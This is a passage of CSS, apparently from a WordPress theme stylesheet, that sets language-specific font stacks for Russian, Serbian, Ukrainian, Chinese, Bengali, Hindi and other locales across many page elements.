.has-drop-cap:lang(ru-RU):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(ru-RU),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(ru-RU),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(ru-RU),.entry .entry-content .wp-block-cover-image h2:lang(ru-RU),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(ru-RU),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(ru-RU),.entry .entry-content .wp-block-cover h2:lang(ru-RU),.entry .entry-content .wp-block-audio figcaption:lang(ru-RU),.entry .entry-content .wp-block-video figcaption:lang(ru-RU),.entry .entry-content .wp-block-image figcaption:lang(ru-RU),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(ru-RU),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(ru-RU),.entry .entry-content .wp-block-file:lang(ru-RU),.entry .entry-content .wp-block-file .wp-block-file__button:lang(ru-RU),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(ru-RU),.wp-caption-text:lang(ru-RU),.gallery-caption:lang(ru-RU){font-family:"Helvetica Neue",Helvetica,"Segoe UI",Arial,sans-serif}body:lang(sah),button:lang(sah),input:lang(sah),select:lang(sah),optgroup:lang(sah),textarea:lang(sah),.author-description .author-link:lang(sah),.comment-metadata:lang(sah),.comment-reply-link:lang(sah),.comments-title:lang(sah),.comment-author .fn:lang(sah),.discussion-meta-info:lang(sah),.entry-meta:lang(sah),.entry-footer:lang(sah),.main-navigation:lang(sah),.no-comments:lang(sah),.not-found .page-title:lang(sah),.error-404 .page-title:lang(sah),.post-navigation .post-title:lang(sah),.page-links:lang(sah),.page-description:lang(sah),.pagination .nav-links:lang(sah),.sticky-post:lang(sah),.site-title:lang(sah),.site-info:lang(sah),#cancel-comment-reply-link:lang(sah),h1:lang(sah),h2:lang(sah),h3:lang(sah),h4:lang(sah),h5:lang(sah),h6:lang(sah),.page-title:lang(sah),blockquote cite:lang(sah),table:lang(sah),.button:lang(sah),input:lang(sah)[type=button],input:lang(sah)[type=reset],input:lang(sah)[type=submit],.comment-navigation .nav-previous:lang(sah),.comment-navigation .nav-next:lang(sah),.comment-list .pingback .comment-body:lang(sah),.comment-list .trackback .comment-body:lang(sah),.comment-list .pingback .comment-body .comment-edit-link:lang(sah),.comment-list .trackback .comment-body .comment-edit-link:lang(sah),.comment-form .comment-notes:lang(sah),.comment-form label:lang(sah),.widget_archive ul li:lang(sah),.widget_categories ul li:lang(sah),.widget_meta ul li:lang(sah),.widget_nav_menu ul li:lang(sah),.widget_pages ul li:lang(sah),.widget_recent_comments ul li:lang(sah),.widget_recent_entries ul li:lang(sah),.widget_rss ul li:lang(sah),.widget_tag_cloud .tagcloud:lang(sah),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(sah),.entry .entry-content .wp-block-button .wp-block-button__link:lang(sah),.entry .entry-content .wp-block-archives li>a:lang(sah),.entry .entry-content .wp-block-categories li>a:lang(sah),.entry .entry-content .wp-block-latest-posts li>a:lang(sah),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(sah),.entry .entry-content .wp-block-verse:lang(sah),.entry .entry-content .has-drop-cap:lang(sah):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(sah),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(sah),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(sah),.entry .entry-content .wp-block-cover-image h2:lang(sah),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(sah),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(sah),.entry .entry-content .wp-block-cover h2:lang(sah),.entry .entry-content .wp-block-audio figcaption:lang(sah),.entry .entry-content .wp-block-video figcaption:lang(sah),.entry .entry-content .wp-block-image figcaption:lang(sah),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(sah),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(sah),.entry .entry-content .wp-block-file:lang(sah),.entry .entry-content .wp-block-file .wp-block-file__button:lang(sah),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(sah),.wp-caption-text:lang(sah),.gallery-caption:lang(sah){font-family:"Helvetica Neue",Helvetica,"Segoe UI",Arial,sans-serif}body:lang(sr-RS),button:lang(sr-RS),input:lang(sr-RS),select:lang(sr-RS),optgroup:lang(sr-RS),textarea:lang(sr-RS),.author-description .author-link:lang(sr-RS),.comment-metadata:lang(sr-RS),.comment-reply-link:lang(sr-RS),.comments-title:lang(sr-RS),.comment-author .fn:lang(sr-RS),.discussion-meta-info:lang(sr-RS),.entry-meta:lang(sr-RS),.entry-footer:lang(sr-RS),.main-navigation:lang(sr-RS),.no-comments:lang(sr-RS),.not-found .page-title:lang(sr-RS),.error-404 .page-title:lang(sr-RS),.post-navigation .post-title:lang(sr-RS),.page-links:lang(sr-RS),.page-description:lang(sr-RS),.pagination .nav-links:lang(sr-RS),.sticky-post:lang(sr-RS),.site-title:lang(sr-RS),.site-info:lang(sr-RS),#cancel-comment-reply-link:lang(sr-RS),h1:lang(sr-RS),h2:lang(sr-RS),h3:lang(sr-RS),h4:lang(sr-RS),h5:lang(sr-RS),h6:lang(sr-RS),.page-title:lang(sr-RS),blockquote cite:lang(sr-RS),table:lang(sr-RS),.button:lang(sr-RS),input:lang(sr-RS)[type=button],input:lang(sr-RS)[type=reset],input:lang(sr-RS)[type=submit],.comment-navigation .nav-previous:lang(sr-RS),.comment-navigation .nav-next:lang(sr-RS),.comment-list .pingback .comment-body:lang(sr-RS),.comment-list .trackback .comment-body:lang(sr-RS),.comment-list .pingback .comment-body .comment-edit-link:lang(sr-RS),.comment-list .trackback .comment-body .comment-edit-link:lang(sr-RS),.comment-form .comment-notes:lang(sr-RS),.comment-form label:lang(sr-RS),.widget_archive ul li:lang(sr-RS),.widget_categories ul li:lang(sr-RS),.widget_meta ul li:lang(sr-RS),.widget_nav_menu ul li:lang(sr-RS),.widget_pages ul li:lang(sr-RS),.widget_recent_comments ul li:lang(sr-RS),.widget_recent_entries ul li:lang(sr-RS),.widget_rss ul li:lang(sr-RS),.widget_tag_cloud .tagcloud:lang(sr-RS),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(sr-RS),.entry .entry-content .wp-block-button .wp-block-button__link:lang(sr-RS),.entry .entry-content .wp-block-archives li>a:lang(sr-RS),.entry .entry-content .wp-block-categories li>a:lang(sr-RS),.entry .entry-content .wp-block-latest-posts li>a:lang(sr-RS),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(sr-RS),.entry .entry-content .wp-block-verse:lang(sr-RS),.entry .entry-content .has-drop-cap:lang(sr-RS):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(sr-RS),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(sr-RS),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(sr-RS),.entry .entry-content .wp-block-cover-image h2:lang(sr-RS),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(sr-RS),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(sr-RS),.entry .entry-content .wp-block-cover h2:lang(sr-RS),.entry .entry-content .wp-block-audio figcaption:lang(sr-RS),.entry .entry-content .wp-block-video figcaption:lang(sr-RS),.entry .entry-content .wp-block-image figcaption:lang(sr-RS),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(sr-RS),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(sr-RS),.entry .entry-content .wp-block-file:lang(sr-RS),.entry .entry-content .wp-block-file .wp-block-file__button:lang(sr-RS),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(sr-RS),.wp-caption-text:lang(sr-RS),.gallery-caption:lang(sr-RS){font-family:"Helvetica Neue",Helvetica,"Segoe UI",Arial,sans-serif}body:lang(tt-RU),button:lang(tt-RU),input:lang(tt-RU),select:lang(tt-RU),optgroup:lang(tt-RU),textarea:lang(tt-RU),.author-description .author-link:lang(tt-RU),.comment-metadata:lang(tt-RU),.comment-reply-link:lang(tt-RU),.comments-title:lang(tt-RU),.comment-author .fn:lang(tt-RU),.discussion-meta-info:lang(tt-RU),.entry-meta:lang(tt-RU),.entry-footer:lang(tt-RU),.main-navigation:lang(tt-RU),.no-comments:lang(tt-RU),.not-found .page-title:lang(tt-RU),.error-404 .page-title:lang(tt-RU),.post-navigation .post-title:lang(tt-RU),.page-links:lang(tt-RU),.page-description:lang(tt-RU),.pagination .nav-links:lang(tt-RU),.sticky-post:lang(tt-RU),.site-title:lang(tt-RU),.site-info:lang(tt-RU),#cancel-comment-reply-link:lang(tt-RU),h1:lang(tt-RU),h2:lang(tt-RU),h3:lang(tt-RU),h4:lang(tt-RU),h5:lang(tt-RU),h6:lang(tt-RU),.page-title:lang(tt-RU),blockquote cite:lang(tt-RU),table:lang(tt-RU),.button:lang(tt-RU),input:lang(tt-RU)[type=button],input:lang(tt-RU)[type=reset],input:lang(tt-RU)[type=submit],.comment-navigation .nav-previous:lang(tt-RU),.comment-navigation .nav-next:lang(tt-RU),.comment-list .pingback .comment-body:lang(tt-RU),.comment-list .trackback .comment-body:lang(tt-RU),.comment-list .pingback .comment-body .comment-edit-link:lang(tt-RU),.comment-list .trackback .comment-body .comment-edit-link:lang(tt-RU),.comment-form .comment-notes:lang(tt-RU),.comment-form label:lang(tt-RU),.widget_archive ul li:lang(tt-RU),.widget_categories ul li:lang(tt-RU),.widget_meta ul li:lang(tt-RU),.widget_nav_menu ul li:lang(tt-RU),.widget_pages ul li:lang(tt-RU),.widget_recent_comments ul li:lang(tt-RU),.widget_recent_entries ul li:lang(tt-RU),.widget_rss ul li:lang(tt-RU),.widget_tag_cloud .tagcloud:lang(tt-RU),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(tt-RU),.entry .entry-content .wp-block-button .wp-block-button__link:lang(tt-RU),.entry .entry-content .wp-block-archives li>a:lang(tt-RU),.entry .entry-content .wp-block-categories li>a:lang(tt-RU),.entry .entry-content .wp-block-latest-posts li>a:lang(tt-RU),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(tt-RU),.entry .entry-content .wp-block-verse:lang(tt-RU),.entry .entry-content .has-drop-cap:lang(tt-RU):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(tt-RU),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(tt-RU),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(tt-RU),.entry .entry-content .wp-block-cover-image h2:lang(tt-RU),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(tt-RU),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(tt-RU),.entry .entry-content .wp-block-cover h2:lang(tt-RU),.entry .entry-content .wp-block-audio figcaption:lang(tt-RU),.entry .entry-content .wp-block-video figcaption:lang(tt-RU),.entry .entry-content .wp-block-image figcaption:lang(tt-RU),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(tt-RU),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(tt-RU),.entry .entry-content .wp-block-file:lang(tt-RU),.entry .entry-content .wp-block-file .wp-block-file__button:lang(tt-RU),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(tt-RU),.wp-caption-text:lang(tt-RU),.gallery-caption:lang(tt-RU){font-family:"Helvetica Neue",Helvetica,"Segoe UI",Arial,sans-serif}body:lang(uk),button:lang(uk),input:lang(uk),select:lang(uk),optgroup:lang(uk),textarea:lang(uk),.author-description .author-link:lang(uk),.comment-metadata:lang(uk),.comment-reply-link:lang(uk),.comments-title:lang(uk),.comment-author .fn:lang(uk),.discussion-meta-info:lang(uk),.entry-meta:lang(uk),.entry-footer:lang(uk),.main-navigation:lang(uk),.no-comments:lang(uk),.not-found .page-title:lang(uk),.error-404 .page-title:lang(uk),.post-navigation .post-title:lang(uk),.page-links:lang(uk),.page-description:lang(uk),.pagination .nav-links:lang(uk),.sticky-post:lang(uk),.site-title:lang(uk),.site-info:lang(uk),#cancel-comment-reply-link:lang(uk),h1:lang(uk),h2:lang(uk),h3:lang(uk),h4:lang(uk),h5:lang(uk),h6:lang(uk),.page-title:lang(uk),blockquote cite:lang(uk),table:lang(uk),.button:lang(uk),input:lang(uk)[type=button],input:lang(uk)[type=reset],input:lang(uk)[type=submit],.comment-navigation .nav-previous:lang(uk),.comment-navigation .nav-next:lang(uk),.comment-list .pingback .comment-body:lang(uk),.comment-list .trackback .comment-body:lang(uk),.comment-list .pingback .comment-body .comment-edit-link:lang(uk),.comment-list .trackback .comment-body .comment-edit-link:lang(uk),.comment-form .comment-notes:lang(uk),.comment-form label:lang(uk),.widget_archive ul li:lang(uk),.widget_categories ul li:lang(uk),.widget_meta ul li:lang(uk),.widget_nav_menu ul li:lang(uk),.widget_pages ul li:lang(uk),.widget_recent_comments ul li:lang(uk),.widget_recent_entries ul li:lang(uk),.widget_rss ul li:lang(uk),.widget_tag_cloud .tagcloud:lang(uk),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(uk),.entry .entry-content .wp-block-button .wp-block-button__link:lang(uk),.entry .entry-content .wp-block-archives li>a:lang(uk),.entry .entry-content .wp-block-categories li>a:lang(uk),.entry .entry-content .wp-block-latest-posts li>a:lang(uk),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(uk),.entry .entry-content .wp-block-verse:lang(uk),.entry .entry-content .has-drop-cap:lang(uk):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(uk),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(uk),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(uk),.entry .entry-content .wp-block-cover-image h2:lang(uk),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(uk),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(uk),.entry .entry-content .wp-block-cover h2:lang(uk),.entry .entry-content .wp-block-audio figcaption:lang(uk),.entry .entry-content .wp-block-video figcaption:lang(uk),.entry .entry-content .wp-block-image figcaption:lang(uk),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(uk),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(uk),.entry .entry-content .wp-block-file:lang(uk),.entry .entry-content .wp-block-file .wp-block-file__button:lang(uk),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(uk),.wp-caption-text:lang(uk),.gallery-caption:lang(uk){font-family:"Helvetica Neue",Helvetica,"Segoe UI",Arial,sans-serif}body:lang(zh-HK),button:lang(zh-HK),input:lang(zh-HK),select:lang(zh-HK),optgroup:lang(zh-HK),textarea:lang(zh-HK),.author-description .author-link:lang(zh-HK),.comment-metadata:lang(zh-HK),.comment-reply-link:lang(zh-HK),.comments-title:lang(zh-HK),.comment-author .fn:lang(zh-HK),.discussion-meta-info:lang(zh-HK),.entry-meta:lang(zh-HK),.entry-footer:lang(zh-HK),.main-navigation:lang(zh-HK),.no-comments:lang(zh-HK),.not-found .page-title:lang(zh-HK),.error-404 .page-title:lang(zh-HK),.post-navigation .post-title:lang(zh-HK),.page-links:lang(zh-HK),.page-description:lang(zh-HK),.pagination .nav-links:lang(zh-HK),.sticky-post:lang(zh-HK),.site-title:lang(zh-HK),.site-info:lang(zh-HK),#cancel-comment-reply-link:lang(zh-HK),h1:lang(zh-HK),h2:lang(zh-HK),h3:lang(zh-HK),h4:lang(zh-HK),h5:lang(zh-HK),h6:lang(zh-HK),.page-title:lang(zh-HK),blockquote cite:lang(zh-HK),table:lang(zh-HK),.button:lang(zh-HK),input:lang(zh-HK)[type=button],input:lang(zh-HK)[type=reset],input:lang(zh-HK)[type=submit],.comment-navigation .nav-previous:lang(zh-HK),.comment-navigation .nav-next:lang(zh-HK),.comment-list .pingback .comment-body:lang(zh-HK),.comment-list .trackback .comment-body:lang(zh-HK),.comment-list .pingback .comment-body .comment-edit-link:lang(zh-HK),.comment-list .trackback .comment-body .comment-edit-link:lang(zh-HK),.comment-form .comment-notes:lang(zh-HK),.comment-form label:lang(zh-HK),.widget_archive ul li:lang(zh-HK),.widget_categories ul li:lang(zh-HK),.widget_meta ul li:lang(zh-HK),.widget_nav_menu ul li:lang(zh-HK),.widget_pages ul li:lang(zh-HK),.widget_recent_comments ul li:lang(zh-HK),.widget_recent_entries ul li:lang(zh-HK),.widget_rss ul li:lang(zh-HK),.widget_tag_cloud .tagcloud:lang(zh-HK),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(zh-HK),.entry .entry-content .wp-block-button .wp-block-button__link:lang(zh-HK),.entry .entry-content .wp-block-archives li>a:lang(zh-HK),.entry .entry-content .wp-block-categories li>a:lang(zh-HK),.entry .entry-content .wp-block-latest-posts li>a:lang(zh-HK),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(zh-HK),.entry .entry-content .wp-block-verse:lang(zh-HK),.entry .entry-content .has-drop-cap:lang(zh-HK):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(zh-HK),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(zh-HK),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(zh-HK),.entry .entry-content .wp-block-cover-image h2:lang(zh-HK),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(zh-HK),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(zh-HK),.entry .entry-content .wp-block-cover h2:lang(zh-HK),.entry .entry-content .wp-block-audio figcaption:lang(zh-HK),.entry .entry-content .wp-block-video figcaption:lang(zh-HK),.entry .entry-content .wp-block-image figcaption:lang(zh-HK),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(zh-HK),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(zh-HK),.entry .entry-content .wp-block-file:lang(zh-HK),.entry .entry-content .wp-block-file .wp-block-file__button:lang(zh-HK),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(zh-HK),.wp-caption-text:lang(zh-HK),.gallery-caption:lang(zh-HK){font-family:-apple-system,BlinkMacSystemFont,"PingFang HK","Helvetica Neue","Microsoft YaHei New",STHeiti Light,sans-serif}body:lang(zh-TW),button:lang(zh-TW),input:lang(zh-TW),select:lang(zh-TW),optgroup:lang(zh-TW),textarea:lang(zh-TW),.author-description .author-link:lang(zh-TW),.comment-metadata:lang(zh-TW),.comment-reply-link:lang(zh-TW),.comments-title:lang(zh-TW),.comment-author .fn:lang(zh-TW),.discussion-meta-info:lang(zh-TW),.entry-meta:lang(zh-TW),.entry-footer:lang(zh-TW),.main-navigation:lang(zh-TW),.no-comments:lang(zh-TW),.not-found .page-title:lang(zh-TW),.error-404 .page-title:lang(zh-TW),.post-navigation .post-title:lang(zh-TW),.page-links:lang(zh-TW),.page-description:lang(zh-TW),.pagination .nav-links:lang(zh-TW),.sticky-post:lang(zh-TW),.site-title:lang(zh-TW),.site-info:lang(zh-TW),#cancel-comment-reply-link:lang(zh-TW),h1:lang(zh-TW),h2:lang(zh-TW),h3:lang(zh-TW),h4:lang(zh-TW),h5:lang(zh-TW),h6:lang(zh-TW),.page-title:lang(zh-TW),blockquote cite:lang(zh-TW),table:lang(zh-TW),.button:lang(zh-TW),input:lang(zh-TW)[type=button],input:lang(zh-TW)[type=reset],input:lang(zh-TW)[type=submit],.comment-navigation .nav-previous:lang(zh-TW),.comment-navigation .nav-next:lang(zh-TW),.comment-list .pingback .comment-body:lang(zh-TW),.comment-list .trackback .comment-body:lang(zh-TW),.comment-list .pingback .comment-body .comment-edit-link:lang(zh-TW),.comment-list .trackback .comment-body .comment-edit-link:lang(zh-TW),.comment-form .comment-notes:lang(zh-TW),.comment-form label:lang(zh-TW),.widget_archive ul li:lang(zh-TW),.widget_categories ul li:lang(zh-TW),.widget_meta ul li:lang(zh-TW),.widget_nav_menu ul li:lang(zh-TW),.widget_pages ul li:lang(zh-TW),.widget_recent_comments ul li:lang(zh-TW),.widget_recent_entries ul li:lang(zh-TW),.widget_rss ul li:lang(zh-TW),.widget_tag_cloud .tagcloud:lang(zh-TW),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(zh-TW),.entry .entry-content .wp-block-button .wp-block-button__link:lang(zh-TW),.entry .entry-content .wp-block-archives li>a:lang(zh-TW),.entry .entry-content .wp-block-categories li>a:lang(zh-TW),.entry .entry-content .wp-block-latest-posts li>a:lang(zh-TW),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(zh-TW),.entry .entry-content .wp-block-verse:lang(zh-TW),.entry .entry-content .has-drop-cap:lang(zh-TW):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(zh-TW),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(zh-TW),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(zh-TW),.entry .entry-content .wp-block-cover-image h2:lang(zh-TW),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(zh-TW),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(zh-TW),.entry .entry-content .wp-block-cover h2:lang(zh-TW),.entry .entry-content .wp-block-audio figcaption:lang(zh-TW),.entry .entry-content .wp-block-video figcaption:lang(zh-TW),.entry .entry-content .wp-block-image figcaption:lang(zh-TW),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(zh-TW),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(zh-TW),.entry .entry-content .wp-block-file:lang(zh-TW),.entry .entry-content .wp-block-file .wp-block-file__button:lang(zh-TW),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(zh-TW),.wp-caption-text:lang(zh-TW),.gallery-caption:lang(zh-TW){font-family:-apple-system,BlinkMacSystemFont,"PingFang TC","Helvetica Neue","Microsoft YaHei New",STHeiti Light,sans-serif}body:lang(zh-CN),button:lang(zh-CN),input:lang(zh-CN),select:lang(zh-CN),optgroup:lang(zh-CN),textarea:lang(zh-CN),.author-description .author-link:lang(zh-CN),.comment-metadata:lang(zh-CN),.comment-reply-link:lang(zh-CN),.comments-title:lang(zh-CN),.comment-author .fn:lang(zh-CN),.discussion-meta-info:lang(zh-CN),.entry-meta:lang(zh-CN),.entry-footer:lang(zh-CN),.main-navigation:lang(zh-CN),.no-comments:lang(zh-CN),.not-found .page-title:lang(zh-CN),.error-404 .page-title:lang(zh-CN),.post-navigation .post-title:lang(zh-CN),.page-links:lang(zh-CN),.page-description:lang(zh-CN),.pagination .nav-links:lang(zh-CN),.sticky-post:lang(zh-CN),.site-title:lang(zh-CN),.site-info:lang(zh-CN),#cancel-comment-reply-link:lang(zh-CN),h1:lang(zh-CN),h2:lang(zh-CN),h3:lang(zh-CN),h4:lang(zh-CN),h5:lang(zh-CN),h6:lang(zh-CN),.page-title:lang(zh-CN),blockquote cite:lang(zh-CN),table:lang(zh-CN),.button:lang(zh-CN),input:lang(zh-CN)[type=button],input:lang(zh-CN)[type=reset],input:lang(zh-CN)[type=submit],.comment-navigation .nav-previous:lang(zh-CN),.comment-navigation .nav-next:lang(zh-CN),.comment-list .pingback .comment-body:lang(zh-CN),.comment-list .trackback .comment-body:lang(zh-CN),.comment-list .pingback .comment-body .comment-edit-link:lang(zh-CN),.comment-list .trackback .comment-body .comment-edit-link:lang(zh-CN),.comment-form .comment-notes:lang(zh-CN),.comment-form label:lang(zh-CN),.widget_archive ul li:lang(zh-CN),.widget_categories ul li:lang(zh-CN),.widget_meta ul li:lang(zh-CN),.widget_nav_menu ul li:lang(zh-CN),.widget_pages ul li:lang(zh-CN),.widget_recent_comments ul li:lang(zh-CN),.widget_recent_entries ul li:lang(zh-CN),.widget_rss ul li:lang(zh-CN),.widget_tag_cloud .tagcloud:lang(zh-CN),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(zh-CN),.entry .entry-content .wp-block-button .wp-block-button__link:lang(zh-CN),.entry .entry-content .wp-block-archives li>a:lang(zh-CN),.entry .entry-content .wp-block-categories li>a:lang(zh-CN),.entry .entry-content .wp-block-latest-posts li>a:lang(zh-CN),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(zh-CN),.entry .entry-content .wp-block-verse:lang(zh-CN),.entry .entry-content .has-drop-cap:lang(zh-CN):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(zh-CN),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(zh-CN),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(zh-CN),.entry .entry-content .wp-block-cover-image h2:lang(zh-CN),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(zh-CN),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(zh-CN),.entry .entry-content .wp-block-cover h2:lang(zh-CN),.entry .entry-content .wp-block-audio figcaption:lang(zh-CN),.entry .entry-content .wp-block-video figcaption:lang(zh-CN),.entry .entry-content .wp-block-image figcaption:lang(zh-CN),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(zh-CN),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(zh-CN),.entry .entry-content .wp-block-file:lang(zh-CN),.entry .entry-content .wp-block-file .wp-block-file__button:lang(zh-CN),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(zh-CN),.wp-caption-text:lang(zh-CN),.gallery-caption:lang(zh-CN){font-family:-apple-system,BlinkMacSystemFont,"PingFang SC","Helvetica Neue","Microsoft YaHei New",STHeiti Light,sans-serif}body:lang(bn-BD),button:lang(bn-BD),input:lang(bn-BD),select:lang(bn-BD),optgroup:lang(bn-BD),textarea:lang(bn-BD),.author-description .author-link:lang(bn-BD),.comment-metadata:lang(bn-BD),.comment-reply-link:lang(bn-BD),.comments-title:lang(bn-BD),.comment-author .fn:lang(bn-BD),.discussion-meta-info:lang(bn-BD),.entry-meta:lang(bn-BD),.entry-footer:lang(bn-BD),.main-navigation:lang(bn-BD),.no-comments:lang(bn-BD),.not-found .page-title:lang(bn-BD),.error-404 .page-title:lang(bn-BD),.post-navigation .post-title:lang(bn-BD),.page-links:lang(bn-BD),.page-description:lang(bn-BD),.pagination .nav-links:lang(bn-BD),.sticky-post:lang(bn-BD),.site-title:lang(bn-BD),.site-info:lang(bn-BD),#cancel-comment-reply-link:lang(bn-BD),h1:lang(bn-BD),h2:lang(bn-BD),h3:lang(bn-BD),h4:lang(bn-BD),h5:lang(bn-BD),h6:lang(bn-BD),.page-title:lang(bn-BD),blockquote cite:lang(bn-BD),table:lang(bn-BD),.button:lang(bn-BD),input:lang(bn-BD)[type=button],input:lang(bn-BD)[type=reset],input:lang(bn-BD)[type=submit],.comment-navigation .nav-previous:lang(bn-BD),.comment-navigation .nav-next:lang(bn-BD),.comment-list .pingback .comment-body:lang(bn-BD),.comment-list .trackback .comment-body:lang(bn-BD),.comment-list .pingback .comment-body .comment-edit-link:lang(bn-BD),.comment-list .trackback .comment-body .comment-edit-link:lang(bn-BD),.comment-form .comment-notes:lang(bn-BD),.comment-form label:lang(bn-BD),.widget_archive ul li:lang(bn-BD),.widget_categories ul li:lang(bn-BD),.widget_meta ul li:lang(bn-BD),.widget_nav_menu ul li:lang(bn-BD),.widget_pages ul li:lang(bn-BD),.widget_recent_comments ul li:lang(bn-BD),.widget_recent_entries ul li:lang(bn-BD),.widget_rss ul li:lang(bn-BD),.widget_tag_cloud .tagcloud:lang(bn-BD),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(bn-BD),.entry .entry-content .wp-block-button .wp-block-button__link:lang(bn-BD),.entry .entry-content .wp-block-archives li>a:lang(bn-BD),.entry .entry-content .wp-block-categories li>a:lang(bn-BD),.entry .entry-content .wp-block-latest-posts li>a:lang(bn-BD),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(bn-BD),.entry .entry-content .wp-block-verse:lang(bn-BD),.entry .entry-content .has-drop-cap:lang(bn-BD):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(bn-BD),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(bn-BD),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(bn-BD),.entry .entry-content .wp-block-cover-image h2:lang(bn-BD),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(bn-BD),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(bn-BD),.entry .entry-content .wp-block-cover h2:lang(bn-BD),.entry .entry-content .wp-block-audio figcaption:lang(bn-BD),.entry .entry-content .wp-block-video figcaption:lang(bn-BD),.entry .entry-content .wp-block-image figcaption:lang(bn-BD),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(bn-BD),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(bn-BD),.entry .entry-content .wp-block-file:lang(bn-BD),.entry .entry-content .wp-block-file .wp-block-file__button:lang(bn-BD),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(bn-BD),.wp-caption-text:lang(bn-BD),.gallery-caption:lang(bn-BD){font-family:Arial,sans-serif}body:lang(hi-IN),button:lang(hi-IN),input:lang(hi-IN),select:lang(hi-IN),optgroup:lang(hi-IN),textarea:lang(hi-IN),.author-description .author-link:lang(hi-IN),.comment-metadata:lang(hi-IN),.comment-reply-link:lang(hi-IN),.comments-title:lang(hi-IN),.comment-author .fn:lang(hi-IN),.discussion-meta-info:lang(hi-IN),.entry-meta:lang(hi-IN),.entry-footer:lang(hi-IN),.main-navigation:lang(hi-IN),.no-comments:lang(hi-IN),.not-found 